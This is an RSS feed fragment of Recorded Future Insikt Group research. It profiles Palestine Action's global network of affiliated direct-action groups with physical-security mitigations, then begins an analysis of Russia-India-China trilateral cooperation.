            <div><strong>Distinction</strong></div>
            <div><strong>Examples</strong></div>
          </div>
          <div>
            <div><strong>Franchise</strong></div>
            <div>Ideology, TTPs, targets</div>
            <div>Area of operation</div>
            <div>Palestina Libera (Italy), Palestine Action Germany, Palestine Action Sweden, Palestine Action Eire (Ireland), Palestine Action Belgium, Palestine Action NL, Palestine Action Norway, Palestine Action Canada, Palestine Action Group Canberra (Australia), Palestine Action Tunisia</div>
          </div>
          <div>
            <div><strong>Affiliate</strong></div>
            <div>Ideology, TTPs</div>
            <div>Area of operation, targets</div>
            <div>Death to Toll (Australia)</div>
          </div>
          <div>
            <div><strong>Offshoot</strong></div>
            <div>Ideology, targets</div>
            <div>Area of operation, TTPs</div>
            <div>Unity of Fields (US), Shut Elbit Down (Germany/Austria)</div>
          </div>
          <div>
            <div><strong>Partner</strong></div>
            <div>Area of operation, TTPs</div>
            <div>Ideology, targets</div>
            <div>Shut the System (UK)</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>Classification of Palestine Action global network groups (Source: Insikt Group)</em></p>
        <h3>Franchise: Palestine Action Italia/Palestina Libera (Italy)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_122ef6d2b5fa1ff9c7d344d1035840e3cfe5798d2.png?width=750&amp;format=png&amp;optimize=medium" width="606" height="115" />
        </p>
        <p><em><strong>Figure 7:</strong></em> <em>Palestine Action Italia logo (Source: Palestine Action Italia)</em></p>
        <p>Palestine Action Italia, more commonly known as Palestina Libera, is Palestine Action’s Italy-based franchise. On its website, the group directly identifies itself as “the Italian branch of the international ‘Palestine Action’ campaign, which in England directly led to the closure of three arms factories involved in the genocide in Gaza.” The group also uses similar branding as the UK branch, employs similar TTPs, and targets the same sectors, focusing largely on defense contractors with facilities in Italy. In particular, Palestina Libera’s direct actions have frequently targeted the Italy-based defense contractor Leonardo at its offices throughout the country, due to its joint ventures with Elbit.</p>
        <p>The organization very likely emerged from pro-Palestinian activist factions in Italy that increasingly aligned with Palestine Action’s global network in the wake of the October 7, 2023, attack. While data in the Recorded Future Platform indicates the group’s website was registered on February 4, 2024, a 2008 <a href="https://badil.org/phocadownload/Badil_docs/publications/al-majdal-38.pdf">issue</a> of al-Majdal Magazine — the quarterly publication of the BADIL Resource Center for Palestinian Residency &amp; Refugee Rights — indicates that the same domain was operated by an Italian pro-Palestinian organization, the Comitato di Solidarietà con il Popolo Palestinese, Torino [Committee for Solidarity with the Palestinian People in Turin, Italy]. Screenshots of the domain captured in the Wayback Machine indicate that between October 2010 and the website’s registration in February 2024, the site displayed a message indicating the administrator should “upload [their] website into the public_html directory.” This message almost certainly indicates that an administrator account was active during the interim, but that it had not uploaded any information onto the domain. The group’s active social media accounts were created in November and December 2023, respectively.</p>
        <p>Following Palestine Action’s July 5, 2025, designation as a terrorist organization in the UK, Palestine Action Italia has likely become one of the organization’s most prioritized franchises. Palestine Action’s main website currently includes a link to donate to Palestina Libera, hosted on Palestina Libera’s website. This donation section uses the service provider Donorbox to facilitate transactions, with options for donors including sending €15 for “a little bit of paint,” €50 for “smoke bombs in action,” €100 for the “legal expenses fund,” or another amount determined by the donor. Palestina Libera has also very likely increased its operational tempo in the wake of the proscription, citing Palestine Action UK’s designation and the arrests of protesters at rallies in the UK as motivation for new direct actions. For instance:</p>
        <ul>
          <li>On October 3, 2025, Palestina Libera took part in pro-Palestine direct actions across Italy, protesting the Israeli government’s interception of the Global Sumud Flotilla. Activists very likely affiliated with Palestina Libera participated in occupations and blockades of major transportation and logistics infrastructure, including <a href="https://www.instagram.com/reel/DPWT8gQjYO9/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">obstructing</a> a runway at Pisa International Airport, <a href="https://www.instagram.com/reel/DPWqPwHDX89/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">occupying</a> several highways in the Tuscany region, and blockading an Amazon Logistics facility in Brandizzo.</li>
          <li>On September 29, 2025, the group <a href="https://www.instagram.com/reel/DPMU7CiDLju/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have blockaded a Leonardo facility in the town of Nerviano. In a social media post, it alleged that at least one Leonardo employee working at the facility joined its protest.</li>
          <li>On September 25, 2025, several of the group’s activists <a href="https://www.instagram.com/reel/DPBW13SjC3F/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">chained</a> themselves together outside a Rheinmetall facility in Rome, which they claimed “hindered production” and “made the gate inaccessible for an entire work shift.”</li>
        </ul>
        <h3>Affiliate: Death to Toll (Australia)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_150556c905aaf15c815e6d439844ade4f10514771.png?width=750&amp;format=png&amp;optimize=medium" width="661" height="416" />
        </p>
        <p><em><strong>Figure 8:</strong></em> <em>Death to Toll logo (Source:</em> <em><a href="https://www.instagram.com/p/DMJ89bkP9FP/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">Instagram</a>)</em></p>
        <p>“Death to Toll” is a campaign by anarchist violent extremists (AVEs) in Australia to conduct vandalism, obstruction, and sabotage against the Australian international logistics and shipping company Toll Group (Toll), its parent organization Japan Post Holdings, and defense contractors working with the Australian Defense Force (ADF), due to accusations that Toll and the ADF are partnering with the Israeli military. The group responsible for this campaign is classified as a Palestine Action affiliate, as it almost certainly shares Palestine Action UK’s ideology and uses TTPs promoted by the group, but operates solely in the Melbourne, Australia area and has chosen its own companies to target.</p>
        <p>The first attack claimed by this group was a <a href="https://www.instagram.com/reel/DCQQoNwNirH/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">sabotage</a> of a Heat Treatment Australia (HTA) facility on October 14, 2024; the campaign against Toll began with an <a href="https://www.instagram.com/p/DDne15_tEvP/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">obstruction</a> of one of the company’s facilities in Melbourne on November 22, 2024. In an August 7, 2025, interview, Death to Toll’s organizers <a href="https://www.sydneycriminallawyers.com.au/blog/everything-is-on-the-table-says-direct-action-group-targeting-toll-holdings-for-driving-genocide/">cited</a> Palestine Action’s targeting of UK shipping organizations that partnered with Elbit as an inspiration for their attacks. They also have shared a copy of Palestine Action’s 2023 instructional guide on their website.</p>
        <p>In recent months, the Death to Toll group has claimed responsibility for several acts of vandalism, obstruction, and sabotage targeting Toll:</p>
        <ul>
          <li>On October 7, 2025, AVEs claimed responsibility for intercepting a Toll fuel truck in Melbourne by obstructing a road with flaming objects. They subsequently spraypainted the truck with red graffiti.</li>
          <li>On August 31, 2025, AVEs <a href="https://www.instagram.com/reel/DO0o6wTD565/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have attacked a Toll facility in Dandenong South. A video posted to the group’s Instagram account shows activists smashing exterior glass doors of the facility with a blunt object and dousing them with a flammable liquid in a bottle, very likely gasoline.</li>
          <li>On August 11, 2025, AVEs <a href="https://www.instagram.com/reel/DNPf4cuoxkd/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have vandalized a Toll facility in Truganina, writing graffiti, spraying red paint, and damaging keycard access devices on the exterior of the facility. Toll <a href="https://www.jpost.com/diaspora/antisemitism/article-864565">confirmed</a> the attack in a statement to the press, and Victoria Police indicated they were investigating the incident.</li>
        </ul>
        <p>Beyond its website, the Death to Toll campaign operates a social media account and accepts submissions from independent AVEs for claims of responsibility and tips on potentially vulnerable facilities on a Mega file-sharing site and through a Proton Mail email address. The social media pages attributed to the group have frequently used the hashtags #socalledaustralia, #DeathToll, and #TheDeathTollisRising. On the front page of their website, the administrators have posted a call to action against industries in Australia that they perceive to be providing support for the IDF. Specifically, they claim that “all sites and equipment used or owned by Toll Holdings and its parent company, Japan Post, are legitimate targets for anti-genocide action. This includes sabotage, vandalism, blockades, strikes, occupations, and all forms of resistance and disruption. Everything is on the table.”</p>
        <h3>Offshoot: Unity of Fields (United States)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18ea20b3f7868e11207e286ab17d6b023d7c636f6.png?width=750&amp;format=png&amp;optimize=medium" width="400" height="400" />
        </p>
        <p><em><strong>Figure 9:</strong></em> <em>Unity of Fields logo (Source:</em> <em><a href="https://x.com/unityoffields">Social Media</a>)</em></p>
        <p>Unity of Fields (UoF) describes itself as an “anti-imperialist propaganda front” that reports on the activities of militant pro-Palestinian activists in the US. In this regard, it functions in a similar fashion to AVE “counter-info” outlets, which provide AVEs in a specified geographic area with information pertaining to upcoming protests and demonstrations, claims of responsibility for AVE attacks, guides and instructional material for carrying out attacks, and communiqués from local AVE groups.</p>
        <p>UoF was almost certainly founded as a Palestine Action franchise in the US: during its initial years of operation, it used the name “Palestine Action US,” was managed by a cell of activists who almost certainly founded the group with <a href="https://therealnews.com/meet-the-activists-fighting-zionism-with-direct-action">insight</a> from Palestine Action UK members, and devoted itself to attacking Elbit facilities in the US using Palestine Action’s standard TTPs.</p>
        <p>From October 7, 2023, to August 2024, Palestine Action US predominantly conducted vandalism, obstruction, and sabotage against Elbit facilities, particularly in Cambridge, Massachusetts, and Merrimack, New Hampshire. Calla Walsh — almost certainly one of Palestine Action US and UoF’s de facto <a href="https://therealnews.com/meet-the-activists-fighting-zionism-with-direct-action">leaders</a> between October 2023 and July 2025 — was arrested and convicted for her role in a November 20, 2023, Palestine Action US <a href="https://www.wmur.com/article/merrimack-new-hampshire-elbit-systems-sentences/62908047">attack</a> on an Elbit facility in Merrimack.</p>
        <p>In August 2024, following Walsh’s release from prison, Palestine Action US announced its rebranding as “Unity of Fields”, appropriating a concept from the Yemeni Houthi movement. The group subsequently renamed its social media and online messenger accounts, launched a new website dedicated to the group’s communiqués and instructional materials, and claimed the group’s new mission was to establish “a militant propaganda front against the US-NATO-zionist axis of imperialism.” In addition to claims of responsibility for attacks, the website also hosts a repository of instructional and ideological material, as well as publications produced by other AVE groups.</p>
        <p>Autonomous pro-Palestinian activists across the US have sent several dozen claims of responsibility to UoF for publication claiming responsibility for operations against an array of targets, including defense contractors (including Magellan Aerospace, Rolls-Royce and MTU America, Lockheed Martin, Ghost Robotics Corporation, Leidos, and Israel Chemicals), banks (including Bank of America, Citibank, Wells Fargo, Chase Bank, and BNY Mellon), shipping and logistics companies (including Maersk and Amazon), US military recruitment centers, law enforcement infrastructure (particularly vehicles), university buildings and officials, public transportation, and construction buildings and equipment. Occasionally, DVEs from outside of the US — including other Palestine Action global network groups — send communiqués to UoF for publication. At the time of writing, the most recent claims of responsibility include:</p>
        <ul>
          <li>An August 7, 2025, communiqué claiming responsibility for an arson of several vehicles at a Lovitt Technologies plant in Melbourne, Australia</li>
          <li>A May 29, 2025, communiqué claiming responsibility for spraypainting several pro-Palestinian messages on a Maersk shipping container in Oakland, California</li>
          <li>A May 9, 2025, communiqué from protesters at the University of Washington that details the occupation of a university building</li>
        </ul>
        <p>UoF has significantly decreased its output of new claims of responsibility since late July 2025, very likely because of internal disputes and a leadership transition within the group. On July 29, 2025, Calla Walsh <a href="https://x.com/callawalsh/status/1950366979233054839">reported</a> on social media that she was “no longer part of” UoF after a dispute over the “direction in which the project is going,” following which Walsh reported “the organization purged me” and that she had “complied with the decision and transferred them ownership of the accounts.” While Insikt Group is unaware of the exact nature of this dispute, Walsh’s departure from UoF directly followed a July 2025 trip she made to Iran, where she <a href="https://x.com/Sobh_festival/status/1945795728795717751">participated</a> in an event hosted by the World Service of the Islamic Republic of Iran Broadcasting (IRIB), Iran’s government-operated media agency. In an October 5, 2025, article on her Substack page, Walsh reported that she had been detained by US Customs and Border Protection (CBP) officers at New York’s John F. Kennedy International Airport following her return from Tehran.</p>
        <h3>Partner: Shut the System (United Kingdom)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a8b8e989596e70bc2cae00253a826090b8f15030.png?width=750&amp;format=png&amp;optimize=medium" width="400" height="400" />
        </p>
        <p><em><strong>Figure 10:</strong></em> <em>Shut the System logo (Source:</em> <em><a href="https://x.com/shut_system/photo">Social Media</a>)</em></p>
        <p>Unlike other groups included in this report, which are predominantly motivated by the Palestinian cause, Shut the System is a UK-based environmental violent extremist (EVE) group that likely <a href="https://x.com/money_rebellion">emerged</a> as an offshoot of the UK climate activist group Extinction Rebellion (XR). However, the group has also almost certainly conducted pro-Palestinian direct actions. In addition, Shut the System has also directly collaborated with Palestine Action in the UK, almost certainly due to substantial overlaps between Palestine Action’s and Shut the System’s TTPs, preferred targets, and areas of operation. For instance, Shut the System frequently targets insurers and banks that it claims provide services to major global fossil fuel extraction projects; Palestine Action has also targeted many of the same companies on the grounds that they provide services to the IDF or Israeli government. Both groups also frequently use vandalism with red paint, projectiles, or blunt objects to deface the facade of target properties, as well as sabotage, although Shut the System has very likely deployed more sophisticated methods of infrastructure sabotage than Palestine Action. Overall, Shut the System fits the profile of a Palestine Action partner organization.</p>
        <p>The first reported Shut the System operation <a href="https://realmedia.press/fossil-fuel-insurance-sabotage">took place</a> in late February 2024. During 2024, the group predominantly conducted vandalism targeting the London offices of insurance companies, such as AIG, Probitas 1492, Chubb, Liberty General, Lloyd’s of London, Markel UK, QBE, Tokio Marine, as well as Barclays, using red paint, graffiti, and projectiles. In a January 2025 <a href="https://realmedia.press/fossil-fuel-insurance-sabotage/">communiqué</a>, Shut the System claims to have selected these companies as targets because they were identified in a November 2023 <a href="https://www.insurancebusinessmag.com/us/news/environmental/revealed--top-fossil-fuel-insurers-465650.aspx">article</a> from Insurance Business Magazine as among the top ten insurers of fossil fuel extraction projects in the world. On June 10, 2024, Shut the System and Palestine Action <a href="https://www.bbc.com/news/articles/c1rrzp1qwp1o">conducted</a> a joint, UK-wide operation targeting Barclays bank branches in Birmingham, Bristol, Brighton, Edinburgh, Exeter, Glasgow, Lancashire, London, Manchester, Northampton, Sheffield, and Solihull. Activists from both groups sprayed red paint on the exterior of the branch facilities and smashed their windows with projectiles.</p>
        <p>Subsequently, the group has very likely expanded its targeting aperture to include conservative think tanks, additional financial services providers, and events for defense contractors, posting claims of responsibility for attacks on its websites and social media profiles. Shut the System’s website also contains instructions on how to conduct vandalism, obstruction, and sabotage on behalf of the group, and provides a list of 38 banks and insurance companies that it identifies as priority targets due to their alleged financing of the fossil fuel industry. The group continues to conduct joint operations with a number of UK-based AVE and EVE cells, including cells affiliated with almost certain Palestine Action offshoot groups. For instance, during the past several months, Shut the System claims to have collaborated with pro-Palestinian militant direct action groups during the following operations:</p>
        <ul>
          <li>On October 8, 2025, Shut the System’s “Palestine solidarity faction” and activists from the UK group Palestine Pulse claimed to have used projectiles and blunt instruments to destroy “entrances, glass panels, security cameras and ID card readers” at a Palantir Technologies facility in London. They additionally claimed to have sprayed red paint on the building’s facade.</li>
          <li>On September 29, 2025, Shut the System claimed to have conducted a joint operation with Shut Elbit Down and French and German XR affiliate groups to target Barclays and BlackRock assets throughout the UK and Europe. Activists sprayed red paint outside of Barclays offices in Paris, France, and Hamburg, Germany, and a BlackRock office in Vienna, Austria, and “superglued locks of [Barclays] branches across the UK.” Additionally, Shut the System stated it targeted two Barclays senior executives in the UK by spraying red paint outside of their personal residences, and sending letters to the executives’ neighbors “inviting them to a cocktail party hosted by the [executive] where they can explain why they have no conscience.”</li>
          <li>On September 8, 2025, Shut the System claimed to have severed fiber-optic cables leading to the London offices of Clarion Events, the company <a href="https://www.find-tender.service.gov.uk/Notice/029807-2025?origin=SearchResults&amp;p=2">responsible</a> for hosting the Defence and Security Equipment International (DSEI) defense trade exhibition. It conducted the action as part of a campaign, “Shut DSEI Down,” that aimed to protest the trade exhibition due to the participation of several defense contractors that pro-Palestinian activists argue provide armaments to the IDF.</li>
        </ul>
        <p>From January 2025 onward, Shut the System frequently used a physical attack TTP that we have not observed in the operations of other Palestine Action global network groups, namely, sabotaging communications infrastructure by cutting fiber optics lines. Instructions on Shut the System’s website demonstrate how to identify fiber optic cable boxes outside of target facilities, locate the correct wires, and sever them to disrupt internet and other communications services to the building. Between August 18 and September 31, 2025, Shut the System launched a campaign titled “Summer of Sabotage” in which it encourages activists to use these and other sabotage TTPs to target banks and financial industry entities.</p>
        <h2>Mitigations</h2>
        <p>The decentralized nature of individual Palestine Action cells entails that activists very likely plan operations in closed or encrypted communications channels that are almost certainly inaccessible to individuals who have not established their bona fides with the group. The groups’ official communications announce operations after the fact; they almost certainly will not provide indicators and warnings (I&amp;W) of planned activities.</p>
        <p>To diminish risks from physical threat activities conducted by Palestine Action’s global network, organizations and their physical security teams should focus on mitigating the effects of attacks by implementing the following approaches. Overall, physical security measures should aim to deny Palestine Action operatives interior access to facilities. The most costly attacks perpetrated by the group — including the June 2025 attack on RAF Brize Norton — took place after activists were able to breach secure perimeters, enter facilities, and sabotage assets stored inside perimeters.</p>
        <ul>
          <li>Recorded Future customers can leverage the Recorded Future Intelligence Operations Platform to monitor communications sources connected to Palestine Action and its global network, in order to determine evolutions in trends in targeting and TTPs and an organization’s overall risk level.</li>
          <li>Customers can use the Recorded Future Platform’s Intelligence Cards, Advanced Query Builder, and Insikt Group reporting to track ongoing global events — such as the Israel-Hamas conflict or the status of Palestine Action’s legal battle against its terrorism designation in the UK — that are likely to affect threat actors’ operational tempo and targeting aperture.</li>
          <li>Integrate this report and other Insikt Group assessments of DVE threat actors’ TTP and targeting into structured tabletop exercises for physical security teams.</li>
          <li>Review and, where necessary, implement governmental <a href="https://www.osce.org/secretariat/597756">guidelines</a> for physical protection of business facilities, particularly with regard to electronic surveillance, secure lighting, and security personnel.</li>
          <li>Conduct vulnerability assessments to enable effective contingency and resiliency planning in the event of an incident of vandalism, obstruction, or sabotage, with particular focus on a successful incident disrupting communications, transportation, and energy infrastructure.</li>
          <li>Limit voluntary publication of information about the functions, layout, and location of critical infrastructure assets at facilities, or security measures at a facility, beyond the levels necessary to comply with legal or regulatory requirements.</li>
        </ul>
        <h2>Outlook</h2>
        <p>While Palestine Action’s branch in the UK continues the ongoing legal appeal of its terrorism designation — very likely until the designation is rescinded or all of its legal options are exhausted — Palestine Action’s global network is very likely to escalate the frequency and scope of its militant direct action operations. In the short to medium term, the formation of new Palestine Action global network groups in North America, Western Europe, Australia, and elsewhere around the world is likely, threatening an increased range of organizations in defense contracting, banking, finance, insurance, and shipping and logistics sectors.</p>
        <p>Extant groups linked to Palestine Action are also likely to traverse the various categories of groups described in this report, with cells inside the UK attempting to separate themselves from the Palestine Action brand to avoid legal scrutiny and cells outside the UK highlighting their connections to Palestine Action to build credibility with AVEs and the pro-Palestine activist movement. As such, we expect existing franchises and affiliates in the UK to increasingly become offshoots and partners while the ban is in effect; the reverse is likely in geographic areas outside the UK where Palestine Action is not a designated terrorist organization.</p>
        <p>Volatile dynamics in the Israel-Hamas conflict and the situation in the Gaza Strip are also very likely to influence Palestine Action’s global network in the short to medium term, especially with regard to the frequency of attacks. At the time of writing, a ceasefire between Israel and Hamas, effective October 10, 2025, remains in effect. While the establishment of the ceasefire likely did not stop Palestine Action network groups from conducting operations — several of the groups profiled in this report have carried out attacks in the interim — any potential breakdown in the ceasefire would very likely augur increased Israeli military activity in the Gaza Strip that has historically caused upticks in attacks related to the network.</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_15526186964d3548d60e4a73cf876721d522ad671.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Implications of Russia-India-China Trilateral Cooperation]]></title>
            <link>https://www.recordedfuture.com/ko/research/implications-of-russia-india-china-trilateral-cooperation</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/implications-of-russia-india-china-trilateral-cooperation</guid>
            <pubDate>Wed, 10 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Examines Russia-India-China trilateral cooperation, U.S. tariffs and sanctions, why a formal bloc is unlikely, and implications for governments and business.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group assesses that the August 2025 meeting of Chinese Communist Party (CCP) General Secretary Xi Jinping, Indian Prime Minister Narendra Modi, and Russian President Vladimir Putin at the Shanghai Cooperation Organization (SCO) Summit likely suggests early interest among the three states to explore trilateral cooperation, though the formation of a resilient bloc remains unlikely.</p>
        <p>United States (US) policy –– particularly the level of sanctions the US places on each country –– is likely one of the primary factors driving the three states to change their level of cooperation. An increase in US sanctions is likely to drive each state to pursue alternative markets; this motivation has led to an acceleration of trilateral cooperation in some areas, and a reduction in others. For example, President Donald Trump’s decision to impose tariffs on India in mid-2025 very likely amplified a warming China-India relationship and reinforced a stable India-Russia relationship. In contrast, US sanctions on Russian oil companies in October 2025 led China and India to decrease their level of Russian oil imports.</p>
        <p>The second factor driving Russia, India, and China to explore trilateral cooperation is very likely their shared strategic interest in a multipolar global order — manifest through fora like SCO and BRICS (Brazil, Russia, India, China, and South Africa).</p>
        <p>However, despite nascent trilateral cooperation, there remains significant divergence among the three countries’ foreign policy goals, governing principles, and economic ambitions, which likely limits the scope of their cooperation. The political, economic, and military dynamics that shape bilateral relationships between China-Russia, China-India, and India-Russia are complex and distinct. Of those relationships, challenges between Beijing and New Delhi are almost certainly the greatest barrier to the formation of a trilateral bloc or alliance. In particular, India’s competition with China for Asia-Pacific regional leadership and influence, a large trade deficit favoring China, and unresolved border disputes will very likely temper the depth of cooperation between the two. All three countries seek to create an alternative center of gravity to the West, but India does not share Russia’s or China’s staunchly anti-Western worldview.</p>
        <p>Although BRICS and SCO almost certainly represent viable opportunities for the three countries to foster trilateral cooperation, significant limitations prevent deeper alignment within these fora. The Russia-India-China (RIC) dialogue format, if rejuvenated, would offer the most likely format to formalize trilateral alignment. Insikt Group identified a range of potential indicators that are likely to reflect a coalescence into a political, economic, or military bloc.</p>
        <p>Deepening trilateral coordination would almost certainly have broad implications for both the public and private sectors, depending on the depth and intensity of the cooperation. For example, the formation of trilateral economic frameworks, such as lower trade barriers or coordinated regulatory schemes, would force private sector companies operating in any of these countries to adapt to new regulatory standards and potentially face increased competition from an enlarged trilateral economic market. Deeper defense cooperation could lead to shifts in the defense industry of each country, as markets adjust to serve the defense needs of each member of the trilateral. If this leads Chinese and Indian defense industries to increasingly look to serve Russian defense needs, it could force companies that currently produce dual-use technologies for China and India to make adjustments to avoid transacting with sanctioned Russian defense entities.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>The single greatest impediment to trilateral cooperation is very likely the deep distrust between China and India, which underpins political, economic, and military competition — including a decades-long border dispute. India’s doctrine of strategic autonomy and its pursuit of “multi-alignment” are likely to limit its willingness to join a formal trilateral bloc with China and Russia that is explicitly positioned as a counterweight to the West.</li>
          <li>However, all three states very likely share a desire for a multipolar world that includes more developed regional centers of power. This likely helps drive trilateral cooperation to avoid US influence that threatens the strategic interests of Russia, China, and India.</li>
          <li>The nearly decade-long strategic partnership between Moscow and Beijing is likely a key factor driving trilateral cooperation, as Russia and China have shared experience developing alternative centers of power to the West. Both states are likely motivated to convince India to adopt a similar strategy.</li>
          <li>An increase in US sanctions and tariffs is very likely to be a primary factor driving greater trilateral cooperation, as all three states seek alternative markets and China and India likely aim to avoid secondary sanctions. In contrast, Western government policies that facilitate China’s and India’s access to Western markets are likely to lessen Beijing’s and New Delhi’s incentive to deepen trilateral economic cooperation.</li>
          <li>Deepened trilateral economic cooperation very likely would increase the prospect that Western companies — especially those operating in India — see heavier state involvement in the private sector and greater Western scrutiny of Indian economic transactions to catch sanctions violations, as New Delhi aligns its practices with Moscow and Beijing.</li>
        </ul>
        <h2>Background: US Policy Likely Driving Nascent Cooperation Among China, India, and Russia</h2>
        <p>We assess that there are early signs of cooperation among India, China, and Russia in recent months and that this cooperation is likely to expand, driven primarily by an emerging thaw in China-India relations. Against the backdrop of strong India-Russia and China-Russia relations, this warming of China-India relations likely increases the prospect of a deeper trilateral relationship. However, a formal China-India-Russia bloc has not yet formed, and significant limitations –– particularly around Beijing-New Delhi tensions –– are likely to challenge such an alignment.</p>
        <p>India has likely calculated that the US’s 50% tariff on Indian exports –– imposed on India in August 2025, comprising a 25% reciprocal tariff and a 25% “penalty” tariff due to India purchasing sanctioned Russian oil –– <a href="https://www.livemint.com/economy/trump-tariffs-government-exploring-alternate-export-markets-to-protect-interests-of-farmers-11757323797479.html">necessitates</a> <a href="https://www.reuters.com/business/finance/indias-small-businesses-scramble-cushion-blow-trumps-50-tariffs-2025-08-28/">looking</a> for alternative markets and <a href="https://economictimes.indiatimes.com/news/economy/foreign-trade/indian-exporters-shift-focus-to-new-markets-amid-us-tariff-hike/articleshow/123621635.cms?from=mdr">deepening</a> foreign partnerships to recoup lost revenue and reinforce relationships India likely views as more reliable, including <a href="https://www.csmonitor.com/World/Asia-South-Central/2025/0930/india-china-trade-tariffs-ports">cultivating</a> its relationship with Beijing. On August 6, 2025, one day before the US imposed a 50% tariff on Indian exports to the US, the Indian Ministry of External Affairs <a href="https://www.mea.gov.in/Speeches-Statements.htm?dtl/39945/Statement_by_Official_Spokesperson#:~:text=Media%20Center,on:%206/8/2025">called</a> the US’s decision “unfair” and “unjustified” and vowed that India would “take all actions necessary to protect its national interests.” India has specifically <a href="https://timesofindia.indiatimes.com/business/india-business/us-tariffs-over-russian-oil-unfair-eam-jaishankar-says-actively-working-on-resolving-issues/articleshow/124320954.cms">highlighted</a> the inconsistency in the US’s application of a penalty tariff on India for importing Russian oil, while other countries, “even those with more adversarial relations with Russia,” have also sourced oil from Russia. China’s <a href="https://www.bloomberg.com/news/articles/2025-09-02/russia-s-oil-exports-swing-to-china-after-india-suffers-us-tariff-hit">increasing</a> oil imports from Russia likely reinforced to New Delhi that the US’s tariff policy was unjust. Indian officials are reportedly <a href="https://www.business-standard.com/external-affairs-defence-security/news/india-us-trade-deal-impact-trump-tariffs-us-supreme-court-125111001525_1.html">monitoring</a> the US Supreme Court case (challenging the Trump administration’s tariffs) to determine its impact on current US-India trade negotiations. A breakthrough in trade talks would likely improve, but not entirely <a href="https://www.lowyinstitute.org/the-interpreter/will-trade-deal-repair-india-us-ties">repair</a>, the deteriorating diplomatic and economic ties between India and the US.</p>
        <p>The US tariffs have likely also <a href="https://www.crisisgroup.org/asia-pacific/south-asia/india-china/india-rekindles-its-china-ties-trumps-tariffs-bite">reinforced</a> an emergent reconciliation between India and China. In August 2025, Chinese Foreign Minister Wang Yi visited New Delhi for the first time in three years. Beijing likely sees economic and political benefit to deepening ties with India, including exploiting the Indian market for Chinese exports and curbing US influence in South Asia. China’s trade surplus with India and status as the top exporter of electronics, telecommunications, and machinery to India likely give Beijing economic leverage in negotiations with India, particularly as India looks to recoup revenue lost due to US tariffs.</p>
        <p>Following Modi’s August 31, 2025, meeting with Xi –– Modi’s first visit to China in seven years, at the SCO Summit in Tianjin –– Modi <a href="https://www.indiatoday.in/india/story/read-full-statement-on-pm-modi-bilateral-meeting-with-president-xi-at-tianjin-sco-summit-2779553-2025-08-31">stated</a> that “a stable relationship and cooperation” between China and India was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century.” Amid India’s stated frustration over US tariffs, the highly publicized friendly interaction between Modi, Xi, and Putin <strong>(Figure 1)</strong> at the SCO Summit sparked concerns over an emergent Russia-India-China troika.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18c4f5e2ffd69ace89bc012728f00a6e81ca819c7.png?width=750&amp;format=png&amp;optimize=medium" width="486" height="441" />
        </p>
        <p><em><strong>Figure 1:</strong></em> <em>Photo posted by Modi of himself with Putin and Xi at the SCO Summit</em></p>
        <p><em>on August 31, 2025 (Source: Social Media)</em></p>
        <p>The nascent warming of China-India relations likely makes deeper trilateral cooperation among China, India, and Russia more probable, as China and Russia, as well as India and Russia, already have strong relations. Thus, a warming China-India relationship ameliorates the biggest barrier to the formation of a trilateral dynamic. In addition, all three states likely see political and economic benefits to deepening cooperation.</p>
        <h2>Areas of Bilateral Intersection and Divergence Among China, India, and Russia</h2>
        <p>Deepening trilateral cooperation among China, India, and Russia likely serves the strategic foreign policy interests of each state, though the trajectory of any fully formed trilateral dynamic is likely to be shaped by nuanced differences among each state’s foreign policy, as well as the bilateral dynamics within this group.</p>
        <h3>China’s Foreign Policy</h3>
        <p>China’s foreign policy toward Russia and India is almost certainly an outgrowth of the country’s primary strategic objectives. These include China’s “core interests,” <a href="https://archive.ph/IpxKT">such as</a> <a href="https://carnegieendowment.org/files/CLM34MS_FINAL.pdf">preserving</a> the CCP’s political power, territorial integrity, and economic development, as well as China’s <a href="https://chinaopensourceobservatory.org/glossary/advancing-towards-the-center-of-the-world-stage">efforts</a> to <a href="https://web.archive.org/web/20250219133111/https://www.fmprc.gov.cn/web/wjbzhd/202501/t20250117_11537992.shtml">shape</a> a “<a href="https://web.archive.org/web/20250310002304/https://www.mfa.gov.cn/eng/wjbzhd/202403/t20240308_11256418.html">multipolar</a>” world, which almost certainly entails independence from US coercion, an increase in China’s international influence, and greater global dependence on China. China very likely sees greater cooperation with Russia and India as supporting these goals, especially in relation to Beijing’s main <a href="https://web.archive.org/web/20230325133108/http://hochiminhcity.china-consulate.gov.cn/xwdt/202303/t20230306_11036576.html">perceived</a> <a href="https://archive.ph/5I8B8">threat</a> — the US. In particular, China almost certainly considers Russia a political, economic, and military partner that helps legitimize China’s narratives about the need for multipolarity and bolster its ability to defend itself from US coercion. China likely <a href="https://carnegieendowment.org/research/2022/12/a-historical-evaluation-of-chinas-india-policy-lessons-for-india-china-relations?lang=en">considers</a> India an important economic partner and judges that frayed India-US relations diminish the US’s efforts to encircle and contain China.</p>
        <h3>India’s Foreign Policy</h3>
